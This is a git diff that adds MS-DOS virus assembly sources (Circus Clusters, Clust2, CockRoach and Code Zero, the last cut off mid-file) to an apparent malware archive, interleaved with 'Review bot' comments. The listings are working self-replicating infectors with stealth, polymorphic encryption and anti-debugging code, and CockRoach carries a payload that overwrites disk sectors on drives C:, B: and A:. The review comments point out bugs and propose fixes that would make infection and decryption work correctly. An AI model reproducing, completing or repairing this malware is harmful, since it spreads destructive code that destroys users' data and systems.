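a byte-exact disassembly, these belong in the header comment as findings rather than as patches.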
@@ -0,0 +1,176 @@ +; +; Circus Clusters by John Tardy +; +; This virus is a purely research virus and will not be very able to spread +; itself. It only infects .EXE files smaller than 64K and have a very small +; relocation header, so it can hide itself there. It is fully stealth and it +; only occupies 273 bytes (512-273=239 bytes left for the exe header and the +; relocation table, which ain't much). However, it is functional and can +; spread itself if the criteria files are aveable. If this virus is enhanced, +; it could be a serious threath to the antiviral community. +; + Org 100h + +Jumpie: Jmp Short Jumper + + Org 17ch + +Old13 DD 0 +Jumper: Jmp Install +New13: Cmp Ah,3 + Je CheckExe + Cmp Ah,2 + Jne Org13 + + Pushf + Call Dword Ptr Cs:[Old13] + Jc Error + Cmp Word Ptr Es:[Bx],7eebh + Jne error + Mov Word Ptr Es:[Bx],'ZM' + Push Di + Push Cx + Push Ax + + Mov Cx,VirLen + Xor Ax,Ax + Mov Di,Bx + Add Di,80h + Rep Stosb + + Pop Ax + Pop Cx + Pop Di +Error: Iret +Org13: Jmp Dword Ptr Cs:[Old13] +CheckExe: + Cmp Word Ptr Es:[Bx],'ZM' ; EXE file? + Jne Org13 ; No do normal INT13 + + Cmp Word Ptr Es:[Bx][4],(60000/512) ; Is it too long? 
+ Jnb Org13 ; Yes do normal INT13 + + Push Ax + Push Cx + Push Si + Push Di + Push Ds + + Push Es + Pop Ds + Mov Si,Bx + Add Si,80h + Mov Cx,VirLen +Find0: Lodsb + Cmp Al,0 + Loope Find0 + Cmp Cx,0 + Jne No0 + + Mov Di,Bx + Add Di,80h + Mov Cx,VirLen + Lea Si,Old13 + Push Cs + Pop Ds + Rep Movsb + Mov Di,Bx + Mov Ax,07eebh + Stosw + +No0: + Pop Ds + Pop Di + Pop Si + Pop Cx + Pop Ax + Jmp Org13 +Install: + Mov Ax,3513h + Int 21h + Mov Word Ptr Cs:Old13[0],Bx + Mov Word Ptr Cs:Old13[2],Es + + mov ah,0dh + int 21h + mov ah,36h + mov dl,0 + int 21h + + mov ax,cs ;adjust memory-size + dec ax + mov ds,ax + cmp byte ptr ds:[0],'Z' + jne quitit +resit: sub word ptr ds:[3],virpar+20h + sub word ptr ds:[12h],VirPar+20h + lea si,old13 + mov di,si + mov es,ds:[12h] + mov ds,cs + mov cx,virlen + rep movsb + + Mov Ax,2513h + Mov Ds,es + Lea Dx,New13 + Int 21h + + Mov Ah,4ah + Push Cs + Pop Es + Mov Bx,VirPar+20h + Int 21h + + push cs + pop ds + mov bx,ds:[2ch] ; environment segment + mov es,bx + xor ax,ax + mov di,1 + +Seek: dec di ; scan for end of environment + scasw + jne Seek + lea si,ds:[di+2] ; es:si = start of filename +Exec: push bx + pop ds + push cs + pop es + + mov di,offset f_name ; copy name of this file + push di + xor bx,bx +movit: mov cx,80 + inc bx + lodsb + cmp al,0 + jne stor + mov al,0dh +stor: stosb + cmp al,0dh + loopne movit + mov f_len,bl + + push cs + pop ds + + pop si + dec si + Int 2eh + +quitit: mov ah,4ch + int 21h + +f_len db 0 +f_name: db 1 + +VirEnd Equ $ +VirLen Equ $-Old13 +VirPar Equ ($-Jumpie)/16 + + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <哪哪哪哪哪哪哪 +; 哪哪哪哪哪> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.cluster2.asm b/MSDOS/Virus.MSDOS.Unknown.cluster2.asm new file mode 100644 index 00000000..11987952 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cluster2.asm 
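Review bot: `mov f_len,bl` executes while DS still holds the environment segment (`push bx / pop ds` at Exec, with BX loaded from `ds:[2ch]`), so the count byte lands at env:f_len and the `f_len db 0` that `int 2eh` receives through DS:SI=cs:f_len keeps its zero, handing DOS an empty command line instead of the host's name; moving the store below the `push cs / pop ds` that follows it, or writing `mov cs:f_len,bl`, fixes this. The same ordering defect is present in the Cluster disassembly in this commit, where the store is spelled `mov byte ptr ds:[28fh],bl`. Two smaller points: `Loope Find0` is followed by `Cmp Cx,0 / Jne No0`, which reads CX=0 as "all zero" even when the final byte failed the compare (a `jnz No0` straight after the loop is the correct test), and `Error: Iret` on the AH=2 path discards the carry flag the original INT 13h returned, so disk read errors are hidden while resident. The `Mov Ds,es` and `mov ds,cs` forms are not encodable on the 8086 and only assemble if the assembler expands them to a PUSH/POP pair, so the header should name the assembler this was built with.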
@@ -0,0 +1,249 @@ +; +; Clust2 virus by John Tardy / TridenT +; +; Virus Name: Clust2 +; Aliases: Cluster-II, Circus Clusters-II +; V Status: Released +; Discovery: Not (yet) +; Symptoms: .EXE altered, possible "sector not found" errors on disk-drives, +; decrease in aveable memory +; Origin: The Netherlands +; Eff Length: 386 bytes (EXE size doesn't change) +; Type Code: ORhE - Overwriting Resident .EXE Infector +; Detection Method: +; Removal Instructions: Delete infected files or copy infected files with the +; virus resident to a device driven unit. +; +; General Comments: +; The Clust2 virus is not yet submitted to any antiviral authority. It +; is from the TridenT Virus Research Centre and was written by someone +; calling himself John Tardy. When an infected program is started, Clust2 +; will become resident in high memory, but below TOM. It hooks interrupt +; 13h and will try to load the program again. Because of it's stealth +; abilities the original program is loaded and will execute normally. +; The Clust2 virus infects files when a write request for interrupt 13h +; is done. It will check if the buffer contains the 'MZ' signature and +; that the candidate file isn't larger than 65000 bytes, and if there are +; enough zeros in the EXE-header. If these contidions are met, Clust2 +; will convert the EXE file to a COM file and inserts it's code in the +; buffer, allowing the original write request to proceed. This way it +; evades critical errors. The Clust2 virus is also stealth and can't be +; detected with virus scanners or checksumming software if the virus is +; resident. File-length and date doesn't change regardless if Clust2 +; is resident. It's also a slighty polymorphic virus, mutating a few +; bytes in it's decryptor. A wildcarded string is needed to find it. 
+; The following text is encrypted within the +; virus: +; +; "[Clust2]" +; "JT / TridenT" +; +; The Clust2 virus not infect files on device driven units, like drives +; compressed with DoubleSpace. It will disinfect when copied to such a +; device. +; +; Sometimes it will issue a "sector not found" error when a file is +; copied to a disk drive. +; +; The Clust2 virus doesn't do anything besides replicating. +; + ORG 100H + +JUMPIE: JMP SHORT JUMPER + + ORG 180H + +JUMPER: CLC + MOV CX,DECRLEN +MORPH EQU $-2 +JASS: LEA SI,DECR +DECRYPT: XOR BYTE PTR [SI],0 +TRIG EQU $-1 +TRAG EQU $-2 +TROG: INC SI +TREG: LOOP DECRYPT + +DECR: MOV AX,3513H + INT 21H + MOV OLD13,BX + MOV OLD13[2],ES + MOV AX,ES:[BX] + CMP AX,0FC80H + JE EXIT + +DOINST: MOV AH,0DH + INT 21H + + MOV AX,CS + DEC AX + MOV DS,AX + CMP BYTE PTR DS:[0],'Z' + JNE EXIT +RESIT: SUB WORD PTR DS:[3],VIRPAR+19H + SUB WORD PTR DS:[12H],VIRPAR+19H + LEA SI,JUMPER + MOV DI,SI + MOV ES,DS:[12H] + MOV DS,CS + MOV CX,VIRLEN + REP MOVSB + + MOV AX,2513H + MOV DS,ES + LEA DX,NEW13 + INT 21H + + PUSH CS + POP ES + MOV BX,100H + MOV SP,BX + MOV AH,4AH + INT 21H + PUSH CS + POP DS + MOV BX,DS:[2CH] + MOV ES,BX + MOV AH,49H + INT 21H + + XOR AX,AX + MOV DI,1 +SEEK: DEC DI + SCASW + JNE SEEK + + LEA SI,DS:[DI+2] +EXEC: PUSH BX + PUSH CS + POP DS + MOV BX,OFFSET PARAM + MOV DS:[BX+4],CS + MOV DS:[BX+8],CS + MOV DS:[BX+12],CS + POP DS + PUSH CS + POP ES + + MOV DI,OFFSET FILENAME + PUSH DI + MOV CX,40 + REP MOVSW + PUSH CS + POP DS + + POP DX + + MOV AX,4B00H + INT 21H +EXIT: MOV AH,4DH + INT 21H + MOV AH,4CH + INT 21H + +OLD13 DW 0,0 + +ORG13: JMP D CS:[OLD13] + +NEW13: CMP AH,3 + JE CHECKEXE + CMP AH,2 + JNE ORG13 +DO: PUSHF + CALL D CS:[OLD13] + CMP ES:[BX],7EEBH + JNE ERROR + MOV ES:[BX],'ZM' + PUSH DI + PUSH CX + PUSH AX + + MOV CX,VIRLEN + XOR AX,AX + LEA DI,BX[80H] + REP STOSB + + POP AX + POP CX + POP DI +ERROR: IRET + +CHECKEXE: CMP ES:[BX],'ZM' + JNE ORG13 + + CMP W ES:BX[4],(65000/512) + JNB ORG13 + + PUSH AX + PUSH 
CX + PUSH SI + PUSH DI + PUSH DS + + PUSH ES + POP DS + LEA SI,BX[80H] + MOV DI,SI + MOV CX,VIRLEN +FIND0: LODSB + OR AL,AL + LOOPE FIND0 + OR CX,CX + JNE NO0 + + XOR AX,AX + MOV DS,AX + MOV AX,DS:[046CH] + PUSH CS + POP DS + TEST AH,1 + JZ NOLOOPFLIP + XOR B TREG,2 +NOLOOPFLIP: TEST AH,2 + JZ NOCLCFLIP + XOR B JUMPER,1 +NOCLCFLIP: + ADD AX,VIRLEN + SHR AX,1 + MOV W MORPH,AX + MOV B TRIG,AH + XOR B TRAG,1 + XOR B JASS,1 + XOR B TROG,1 + MOV CX,CRYPT + LEA SI,JUMPER + REP MOVSB + MOV CX,DECRLEN + LEA SI,DECR +CODEIT: LODSB + XOR AL,AH + STOSB + LOOP CODEIT + MOV DI,BX + MOV AX,07EEBH + STOSW + +NO0: POP DS + POP DI + POP SI + POP CX + POP AX + JMP ORG13 + + DB '[Clust2]' + +PARAM DW 0,80H,?,5CH,?,6CH,? + + DB 'JT / TridenT' + +FILENAME EQU $ +DECRLEN EQU $-DECR +CRYPT EQU DECR-JUMPER +VIRLEN EQU $-JUMPER +VIRPAR EQU ($-JUMPER)/16 + + + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <哪哪哪哪哪哪哪 +; 哪哪哪哪哪> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.cocroach.asm b/MSDOS/Virus.MSDOS.Unknown.cocroach.asm new file mode 100644 index 00000000..bb704d14 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cocroach.asm 
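Review bot: The decryptor loop count written into the infected copy is not DECRLEN: `MORPH EQU $-2` names the immediate of `MOV CX,DECRLEN`, `MOV W MORPH,AX` overwrites it with the timer-derived value in AX, while the CODEIT loop encrypts exactly `DECRLEN` bytes with key AH. When AX exceeds DECRLEN the decryptor keeps XORing memory past the virus body (survivable here only because the host is re-executed from disk), but when the timer word leaves AX below DECRLEN the body is decrypted only in part; dropping `MOV W MORPH,AX` and keeping `MOV B TRIG,AH` makes the two loops agree. The SI/DI swap also appears to assume `LEA SI,DECR` is emitted as `MOV SI,imm16` (BE), since `XOR B JASS,1` applied to an 8D LEA opcode yields 8C; that is assembler-dependent and, together with the `D`/`W`/`B` size shorthand, should be recorded in the header. The residency test `CMP AX,0FC80H` only checks that the current INT 13h vector starts with `CMP AH,…`, which any other hook beginning the same way satisfies, in which case the infected program jumps to EXIT and terminates without ever running the host; and `ERROR: IRET` on the AH=2 path drops the carry flag the original handler returned, as in the other two Cluster listings.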
@@ -0,0 +1,336 @@ +; COCROACH.ASM -- CockRoach Virus 1.0 +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Anonymous Caller + +virus_type equ 1 ; Overwriting Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +start label near + +main proc near +flag: cmp dx,0 + xchg dx,ax + + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + mov bx,offset null_vector ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + mov cx,0007h ; Do 7 infections +search_loop: push cx ; Save CX + call search_files ; Find and infect a file + pop cx ; Restore CX + loop search_loop ; Repeat until CX is 0 + + mov bx,0001h ; First argument is 1 + mov si,0002h ; Second argument is 2 + push es ; Save ES + xor ax,ax ; Set the extra segment to + mov es,ax ; zero (ROM BIOS) + shl bx,1 ; Convert to word index + shl si,1 ; Convert to word index + mov ax,word ptr [bx + 03FEh]; Zero COM port address + xchg word ptr [si + 03FEh],ax; Put first value in second, + mov word ptr [bx + 03FEh],ax; and second value in first! + pop es ; Restore ES + + mov ax,0002h ; First argument is 2 + mov cx,0096h ; Second argument is 150 + cli ; Disable interrupts (no Ctrl-C) + cwd ; Clear DX (start with sector 0) +trash_loop: int 026h ; DOS absolute write interrupt + dec ax ; Select the previous disk + cmp ax,-1 ; Have we gone too far? 
+ jne trash_loop ; If not, repeat with new drive + sti ; Restore interrupts + + mov ax,04C00h ; DOS terminate function + int 021h +main endp + + + db 036h,0D6h,0D4h,0E6h,029h + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,135 ; Allocate 135 bytes on stack + + mov byte ptr [bp - 135],'\' ; Start with a backslash + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 134] ; SI points to 64-byte buffer + int 021h + + call traverse_path ; Start the traversal + +traversal_loop: cmp word ptr [path_ad],0 ; Was the search unsuccessful? + je done_searching ; If so then we're done + call found_subdir ; Otherwise copy the subdirectory + + mov ax,cs ; AX holds the code segment + mov ds,ax ; Set the data and extra + mov es,ax ; segments to the code segment + + xor al,al ; Zero AL + stosb ; NULL-terminate the directory + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 70] ; DX points to the directory + int 021h + + mov dx,offset com_mask ; DX points to "*.COM" + call find_files ; Try to infect a .COM file + jnc done_searching ; If successful the exit + mov dx,offset exe_mask ; DX points to "*.EXE" + call find_files ; Try to infect an .EXE file + jnc done_searching ; If successful the exit + jmp short traversal_loop ; Keep checking the PATH + +done_searching: mov ah,03Bh ; DOS change directory function + lea dx,[bp - 135] ; DX points to old directory + int 021h + + cmp word ptr [path_ad],0 ; Did we run out of directories? 
+ jne at_least_tried ; If not then exit + stc ; Set the carry flag for failure +at_least_tried: mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller +com_mask db "*.COM",0 ; Mask for all .COM files +exe_mask db "*.EXE",0 ; Mask for all .EXE files +search_files endp + +traverse_path proc near + mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment + xor di,di ; DI holds the starting offset + +find_path: mov si,offset path_string ; SI points to "PATH=" + lodsb ; Load the "P" into AL + mov cx,08000h ; Check the first 32767 bytes + repne scasb ; Search until the byte is found + mov cx,4 ; Check the next four bytes +check_next_4: lodsb ; Load the next letter of "PATH=" + scasb ; Compare it to the environment + jne find_path ; If there not equal try again + loop check_next_4 ; Otherwise keep checking + + mov word ptr [path_ad],di ; Save the PATH address for later + mov word ptr [path_ad + 2],es ; Save PATH's segment for later + ret ; Return to caller + +path_string db "PATH=" ; The PATH string to search for +path_ad dd ? ; Holds the PATH's address +traverse_path endp + +found_subdir proc near + lds si,dword ptr [path_ad] ; DS:SI points to the PATH + lea di,[bp - 70] ; DI points to the work buffer + push cs ; Transfer CS into ES for + pop es ; byte transfer +move_subdir: lodsb ; Load the next byte into AL + cmp al,';' ; Have we reached a separator? + je moved_one ; If so we're done copying + or al,al ; Are we finished with the PATH? 
+ je moved_last_one ; If so get out of here + stosb ; Store the byte at ES:DI + jmp short move_subdir ; Keep transfering characters + +moved_last_one: xor si,si ; Zero SI to signal completion +moved_one: mov word ptr es:[path_ad],si; Store SI in the path address + ret ; Return to caller +found_subdir endp + + db 010h,08Eh,0B5h,016h,002h + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! + jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 0FDh,052h,0B3h,06Ah,08Ch + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ch],0 ; Is the file > 65535 bytes? + jne infection_done ; If it is then exit + + cmp word ptr [si + 025h],'DN' ; Might this be COMMAND.COM? 
+ je infection_done ; If it is then skip it + + cmp word ptr [si + 01Ah],(finish - start) + jb infection_done ; If it's too small then exit + + mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,4 ; CX holds bytes to read (4) + mov dx,offset buffer ; DX points to buffer + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + push si ; Save DTA address before compare + mov si,offset buffer ; SI points to comparison buffer + mov di,offset flag ; DI points to virus flag + mov cx,4 ; CX holds number of bytes (4) + rep cmpsb ; Compare the first four bytes + pop si ; Restore DTA address + je infection_done ; If equal then exit + mov byte ptr [set_carry],1 ; Success -- the file is OK + + mov ax,04301h ; DOS set file attrib. function + xor cx,cx ; Clear all attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + + mov ax,03D02h ; DOS open file function, r/w + int 021h + xchg bx,ax ; BX holds file handle + + push si ; Save SI through call + call encrypt_code ; Write an encrypted copy + pop si ; Restore SI + + mov ax,05701h ; DOS set file time function + mov cx,[si + 016h] ; CX holds old file time + mov dx,[si + 018h] ; DX holds old file date + int 021h + + mov ah,03Eh ; DOS close file function + int 021h + + mov ax,04301h ; DOS set file attrib. function + xor ch,ch ; Clear CH for file attribute + mov cl,[si + 015h] ; CX holds file's old attributes + lea dx,[si + 01Eh] ; DX points to victim's name + int 021h + +infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed + ret ; Return to caller + +buffer db 4 dup (?) ; Buffer to hold test data +set_carry db ? ; Set-carry-on-exit flag +infect_file endp + + +vcl_marker db "[VCL]",0 ; VCL creation marker + + +note db "CockRoach 1.0 Virus" + db "By Anonymous Caller" + db "[LegenD] Systems 1992!" 
+ +encrypt_code proc near + mov si,offset encrypt_decrypt; SI points to cipher routine + + xor ah,ah ; BIOS get time function + int 01Ah + mov word ptr [si + 8],dx ; Low word of timer is new key + + xor byte ptr [si],1 ; + xor byte ptr [si + 7],1 ; Change all SIs to DIs + xor word ptr [si + 10],0101h; (and vice-versa) + + mov di,offset finish ; Copy routine into heap + mov cx,finish - encrypt_decrypt - 1 ; All but final RET + push si ; Save SI for later + push cx ; Save CX for later + rep movsb ; Copy the bytes + + mov si,offset write_stuff ; SI points to write stuff + mov cx,5 ; CX holds length of write + rep movsb ; Copy the bytes + + pop cx ; Restore CX + pop si ; Restore SI + inc cx ; Copy the RET also this time + rep movsb ; Copy the routine again + + mov ah,040h ; DOS write to file function + mov dx,offset start ; DX points to virus + + call finish ; Encrypt/write/decrypt + + ret ; Return to caller + +write_stuff: mov cx,finish - start ; Length of code + int 021h +encrypt_code endp + +end_of_code label near + +encrypt_decrypt proc near + mov si,offset start_of_code ; SI points to code to decrypt + mov cx,(end_of_code - start_of_code) / 2 ; CX holds length +xor_loop: db 081h,034h,00h,00h ; XOR a word by the key + inc si ; Do the next word + inc si ; + loop xor_loop ; Loop until we're through + ret ; Return to caller +encrypt_decrypt endp +finish label near + +code ends + end main \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.codezero.asm b/MSDOS/Virus.MSDOS.Unknown.codezero.asm new file mode 100644 index 00000000..23010d9c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.codezero.asm 
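Review bot: The COMMAND.COM guard in infect_file compares the wrong bytes: with the ASCIIZ name at DTA+1Eh (the offset the `lea dx,[si + 01Eh]` open uses), the 'N','D' of "COMMAND.COM" sit at +23h/+24h, so `cmp word ptr [si + 025h],'DN'` reads ".C" there and the skip never fires; `cmp word ptr [si + 023h],'DN'` is the intended test. The same routine takes the handle from `xchg bx,ax` after both `int 021h` opens without testing CF, so a failed open leaves BX holding the DOS error code and the subsequent read, write and close go to whatever that value happens to be. In the INT 26h payload loop each call leaves a FLAGS word on the stack that is never popped, and on error AX returns a status code rather than the drive number the `dec ax / cmp ax,-1` sequence expects, so the loop can skip drives or continue with a bogus AL; a header comment stating that the payload writes 150 sectors from sector 0 of drives C:, B: and A: out of DS:BX would help readers of the corpus. These are properties of the VCL generator output and are recorded here as findings rather than as changes to apply.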
@@ -0,0 +1,381 @@ +; CODEZERO.ASM -- Code Zero Virus +; Created with Nowhere Man's Virus Creation Laboratory v1.00 +; Written by Nowhere Man + +virus_type equ 0 ; Appending Virus +is_encrypted equ 1 ; We're encrypted +tsr_virus equ 0 ; We're not TSR + +code segment byte public + assume cs:code,ds:code,es:code,ss:code + org 0100h + +main proc near + db 0E9h,00h,00h ; Near jump (for compatibility) +start: call find_offset ; Like a PUSH IP +find_offset: pop bp ; BP holds old IP + sub bp,offset find_offset ; Adjust for length of host + + call encrypt_decrypt ; Decrypt the virus + +start_of_code label near + + lea si,[bp + buffer] ; SI points to original start + mov di,0100h ; Push 0100h on to stack for + push di ; return to main program + movsw ; Copy the first two bytes + movsb ; Copy the third byte + + mov di,bp ; DI points to start of virus + + mov bp,sp ; BP points to stack + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer on stack + int 021h + +stop_tracing: mov cx,09EBh + mov ax,0FE05h ; Acutal move, plus a HaLT + jmp $-2 + add ah,03Bh ; AH now equals 025h + jmp $-10 ; Execute the HaLT + lea bx,[di + null_vector] ; BX points to new routine + push cs ; Transfer CS into ES + pop es ; using a PUSH/POP + int 021h + mov al,1 ; Disable interrupt 1, too + int 021h + jmp short skip_null ; Hop over the loop +null_vector: jmp $ ; An infinite loop +skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged +lock_keys: mov al,128 ; Change here screws DEBUG + out 021h,al ; If tracing then lock keyboard + + call search_files ; Find and infect a file + + call infected_all + or ax,ax ; Did the function return zero? 
+ jne skip00 ; If not equal, skip effect + jmp short strt00 ; Success -- skip jump +skip00: jmp end00 ; Skip the routine +strt00: lea si,[di + data00] ; SI points to data + mov ah,0Eh ; BIOS display char. function +display_loop: lodsb ; Load the next char. into AL + or al,al ; Is the character a null? + je disp_strnend ; If it is, exit + int 010h ; BIOS video interrupt + jmp short display_loop ; Do the next character +disp_strnend: + +end00: +com_end: pop dx ; DX holds original DTA address + mov ah,01Ah ; DOS set DTA function + int 021h + + mov sp,bp ; Deallocate local buffer + + xor ax,ax ; + mov bx,ax ; + mov cx,ax ; + mov dx,ax ; Empty out the registers + mov si,ax ; + mov di,ax ; + mov bp,ax ; + + ret ; Return to original program +main endp + + + db 064h,06Dh,056h,0D5h,05Dh + +search_files proc near + push bp ; Save BP + mov bp,sp ; BP points to local buffer + sub sp,64 ; Allocate 64 bytes on stack + + mov ah,047h ; DOS get current dir function + xor dl,dl ; DL holds drive # (current) + lea si,[bp - 64] ; SI points to 64-byte buffer + int 021h + + mov ah,03Bh ; DOS change directory function + lea dx,[di + root] ; DX points to root directory + int 021h + + call traverse ; Start the traversal + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 64] ; DX points to old directory + int 021h + + mov sp,bp ; Restore old stack pointer + pop bp ; Restore BP + ret ; Return to caller + +root db "\",0 ; Root directory +search_files endp + +traverse proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first function + mov cx,00010000b ; CX holds search attributes + lea dx,[di + all_files] ; DX points to "*.*" + int 021h + jc leave_traverse ; Leave if no files present + +check_dir: cmp byte ptr [bp - 
107],16 ; Is the file a directory? + jne another_dir ; If not, try again + cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? + je another_dir ;If so, keep going + + mov ah,03Bh ; DOS change directory function + lea dx,[bp - 98] ; DX points to new directory + int 021h + + call traverse ; Recursively call ourself + + pushf ; Save the flags + mov ah,03Bh ; DOS change directory function + lea dx,[di + up_dir] ; DX points to parent directory + int 021h + popf ; Restore the flags + + jnc done_searching ; If we infected then exit + +another_dir: mov ah,04Fh ; DOS find next function + int 021h + jnc check_dir ; If found check the file + +leave_traverse: + lea dx,[di + com_mask] ; DX points to "*.COM" + call find_files ; Try to infect a file +done_searching: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller + +up_dir db "..",0 ; Parent directory name +all_files db "*.*",0 ; Directories to search for +com_mask db "*.COM",0 ; Mask for all .COM files +traverse endp + + db 0D9h,013h,047h,056h,001h + + +find_files proc near + push bp ; Save BP + + mov ah,02Fh ; DOS get DTA function + int 021h + push bx ; Save old DTA address + + mov bp,sp ; BP points to local buffer + sub sp,128 ; Allocate 128 bytes on stack + + push dx ; Save file mask + mov ah,01Ah ; DOS set DTA function + lea dx,[bp - 128] ; DX points to buffer + int 021h + + mov ah,04Eh ; DOS find first file function + mov cx,00100111b ; CX holds all file attributes + pop dx ; Restore file mask +find_a_file: int 021h + jc done_finding ; Exit if no files found + call infect_file ; Infect the file! 
+ jnc done_finding ; Exit if no error + mov ah,04Fh ; DOS find next file function + jmp short find_a_file ; Try finding another file + +done_finding: mov sp,bp ; Restore old stack frame + mov ah,01Ah ; DOS set DTA function + pop dx ; Retrieve old DTA address + int 021h + + pop bp ; Restore BP + ret ; Return to caller +find_files endp + + db 005h,083h,072h,0C1h,006h + +infect_file proc near + mov ah,02Fh ; DOS get DTA address function + int 021h + mov si,bx ; SI points to the DTA + + mov byte ptr [di + set_carry],0 ; Assume we'll fail + + cmp word ptr [si + 01Ah],(65279 - (finish - start)) + jbe size_ok ; If it's small enough continue + jmp infection_done ; Otherwise exit + +size_ok: mov ax,03D00h ; DOS open file function, r/o + lea dx,[si + 01Eh] ; DX points to file name + int 021h + xchg bx,ax ; BX holds file handle + + mov ah,03Fh ; DOS read from file function + mov cx,3 ; CX holds bytes to read (3) + lea dx,[di + buffer] ; DX points to buffer + int 021h + + mov ax,04202h ; DOS file seek function, EOF + cwd ; Zero DX _ Zero bytes from end + mov cx,dx ; Zero CX / + int 021h + + xchg dx,ax ; Faster than a PUSH AX + mov ah,03Eh ; DOS close file function + int 021h + xchg dx,ax ; Faster than a POP AX + + sub ax,finish - start + 3 ; Adjust AX for a valid jump + cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? + je infection_done ; If equal then exit + mov byte ptr [di + set_carry],1 ; Success -- the file is OK + add ax,finish - start ; Re-adjust to make the jump + mov word ptr [di + new_jump + 1],ax ; Construct jump + + mov ax,04301h ; DOS set file attrib. 
function
+ xor cx,cx ; Clear all attributes
+ lea dx,[si + 01Eh] ; DX points to victim's name
+ int 021h
+
+ mov ax,03D02h ; DOS open file function, r/w
+ int 021h
+ xchg bx,ax ; BX holds file handle
+
+ mov ah,040h ; DOS write to file function
+ mov cx,3 ; CX holds bytes to write (3)
+ lea dx,[di + new_jump] ; DX points to the jump we made
+ int 021h
+
+ mov ax,04202h ; DOS file seek function, EOF
+ cwd ; Zero DX _ Zero bytes from end
+ mov cx,dx ; Zero CX /
+ int 021h
+
+ push si ; Save SI through call
+ call encrypt_code ; Write an encrypted copy
+ pop si ; Restore SI
+
+ mov ax,05701h ; DOS set file time function
+ mov cx,[si + 016h] ; CX holds old file time
+ mov dx,[si + 018h] ; DX holds old file date
+ int 021h
+
+ mov ah,03Eh ; DOS close file function
+ int 021h
+
+ mov ax,04301h ; DOS set file attrib. function
+ xor ch,ch ; Clear CH for file attribute
+ mov cl,[si + 015h] ; CX holds file's old attributes
+ lea dx,[si + 01Eh] ; DX points to victim's name
+ int 021h
+
+infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
+ ret ; Return to caller
+
+set_carry db ? ; Set-carry-on-exit flag
+buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
+new_jump db 0E9h,?,? 
